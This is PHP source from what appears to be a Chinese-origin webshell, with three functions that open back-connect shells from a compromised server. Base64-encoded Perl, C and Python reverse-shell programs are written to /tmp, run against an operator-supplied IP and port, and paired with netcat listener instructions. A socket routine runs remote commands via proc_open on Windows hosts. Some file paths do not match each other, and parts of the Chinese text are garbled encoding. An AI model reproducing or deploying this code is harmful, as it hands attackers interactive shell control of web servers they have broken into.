function Linux_k() { $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; print <<<END <form method="POST" name="kform" id="kform" action="?s=k"> <div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div> <div class="actall">连接端口 <input type="text" name="yourport" value="12666" style="width:400px"></div> <div class="actall">执行方式 <select name="use" > <option value="perl">perl</option> <option value="c">c</option> </select></div> <div class="actall"><input type="submit" value="连接" style="width:80px;"></div></form> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '<div class="actall">'; if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/yoco_bc', base64_decode($back_connect_pl), 'wb') ? '创建/tmp/yoco_bc成功<br>' : '创建/tmp/yoco_bc失败<br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : '执行命令失败'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/yoco_bc.c', base64_decode($back_connect_c), 'wb') ? '创建/tmp/yoco_bc.c成功<br>' : '创建/tmp/yoco_bc.c失败<br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/spider_bc.c'); echo Exec_Run('/tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : '执行命令失败'; } echo '<br>你可以尝试连接端口 (nc -l -n -v -p ' . $_POST['yourport'] . ') </div>'; } return true; }
function backconn() { $ty = $_GET['ty']; if ($ty == 'socket') { @set_time_limit(0); $system = strtoupper(substr(PHP_OS, 0, 3)); if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); } else { @dl('sockets.so') or die("Can't load socket"); } } if (isset($_POST['host']) && isset($_POST['port'])) { $host = $_POST['host']; $port = $_POST['port']; } else { print <<<END <div class="actall"><form method=post action="?s=dd&ty=socket"> <br>��������:<input type="radio" name=info value="linux">Linux <input type="radio" name=info value="win" checked>Windows<br><br> ������<input type=text name=host value=""><br> �˿ڣ�<input type=text name=port value="1120"><br><br> <input class="bt" type=submit name=submit value="��������"><br><br></form></div> END; } if ($system == "WIN") { $env = array('path' => 'c:\\windows\\system32'); } else { $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $host = gethostbyname($host); $proto = getprotobyname("tcp"); if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) { die("Socket����ʧ��"); } if (($ret = socket_connect($sock, $host, $port)) < 0) { die("����ʧ��"); } else { $message = " Silic Group Hacker Army - BlackBap.Org - PHP��������\n"; socket_write($sock, $message, strlen($message)); $cwd = str_replace('\\', '/', dirname(__FILE__)); while ($cmd = socket_read($sock, 65535, $proto)) { if (trim(strtolower($cmd)) == "exit") { socket_write($sock, "Bye\n"); exit; } else { $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock, $msg, strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock, $msg, strlen($msg)); $return_value = proc_close($process); } } } } } elseif ($ty == 'linux') { $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; print <<<END <div class="actall"><form method="POST" name="kform" id="kform" action="?s=dd&ty=linux"> <br>���ĵ�ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"><br> ���Ӷ˿� <input type="text" name="yourport" value="12666" style="width:400px"><br> ִ�з�ʽ <select name="use"><option value="perl">perl</option><option value="c">c</option></select> <input type="submit" value="��������" style="width:80px;"><br><br><br></form></div> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '<div class="actall">'; if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/yoco_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/yoco_bc�ɹ�<br>' : '����/tmp/yoco_bcʧ��<br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/yoco_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/yoco_bc.c�ɹ�<br>' : '����/tmp/yoco_bc.cʧ��<br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/yoco.c'); echo Exec_Run('/tmp/yoco_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -l -n -v -p ' . $_POST['yourport'] : 'ִ������ʧ��'; } echo '<br>�����Գ������Ӷ˿� (nc -l -n -v -p ' . $_POST['yourport'] . ') </div>'; } return true; } else { print <<<END <div class="actall"><pre> <br><a href="?s=dd&ty=linux"> [ C/Perl ���� - Linux ] </a><br><br> <h5>����������linux��Ȩ�еķ���cmd���ӡ�<br> ԭ���ǽ��������ӹ��ܵ�perl�ű�����C����д��/tmp�ļ��в�����<br> ��php����������ִ�к��������ܵ��·���ʧ��<br> ����������nc���������˿ڣ�����nc -vv -l -p 12666</h5><br><br><br> <a href="?s=dd&ty=socket"> [ Socket���� - Windows ] </a><br><br> <h5>PHPʹ��Socket����cmdshell�������ӡ�Webshell���ڷ���������ΪWindowsϵͳ<br> Ŀǰû�з����з�����������Socket���������������ƣ���php_sockets��������Ϊopen/enable<br> ����ͨ��phpinfo()�����鿴�������Ƿ�����php_socket����<br> Socket�������ӵ���;���ڵ�PHP�����˲�������ִ�к�����������ִ��<br> ��ҪäĿ���ӣ����������ɷ�������������Դ�ľ������غ���<br> ������������nc.exe�����˿ڣ�����nc -vv -l -p 5555<br></h5> </pre></div> END; } }
function Linux_l() { echo '<br><br>'; print <<<END <div class="actall" style="height:100px;"><form method="POST" name="lform" id="lform" action="?s=l"> Your IP: <input type="text" name="yourip" value="" style="width:200px"> Your Port: <input type="text" name="yourport" value="1120" style="width:100px"> Script Used: <select name="use" > <option value="perl">perl</option> <option value="python">python</option> <option value="c">c</option> </select> <input class="bt" type="submit" value="Connect"></form><br> END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/b4che10r_pl', base64_decode($back_connect_pl), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl faild</font><br>'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath . ' /tmp/b4che10r_pl ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>'; } if ($_POST['use'] == 'python') { $back_connect_py = "IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS" . "BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn" . "cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC" . "BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo" . "c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl" . "0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4" . "aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG" . "dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo" . "ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ=="; echo File_Write('/tmp/b4che10r_py', base64_decode($back_connect_py), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py faild</font><br>'; $pypath = Exec_Run('which python'); $pypath = $pypath ? chop($pypath) : 'python'; echo Exec_Run($pypath . ' /tmp/b4che10r_py ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/b4che10r_bc.c', base64_decode($back_connect_c), 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c faild</font><br>'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/b4che10r_bc.c'); echo Exec_Run('/tmp/b4che10r_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command successfully</font>' : '<font style=font:11pt color=ff0000>execute command faild</font>'; } echo '<br>local machine need run (nc -vv -l -p ' . $_POST['yourport'] . ')'; } echo '</div>'; return true; }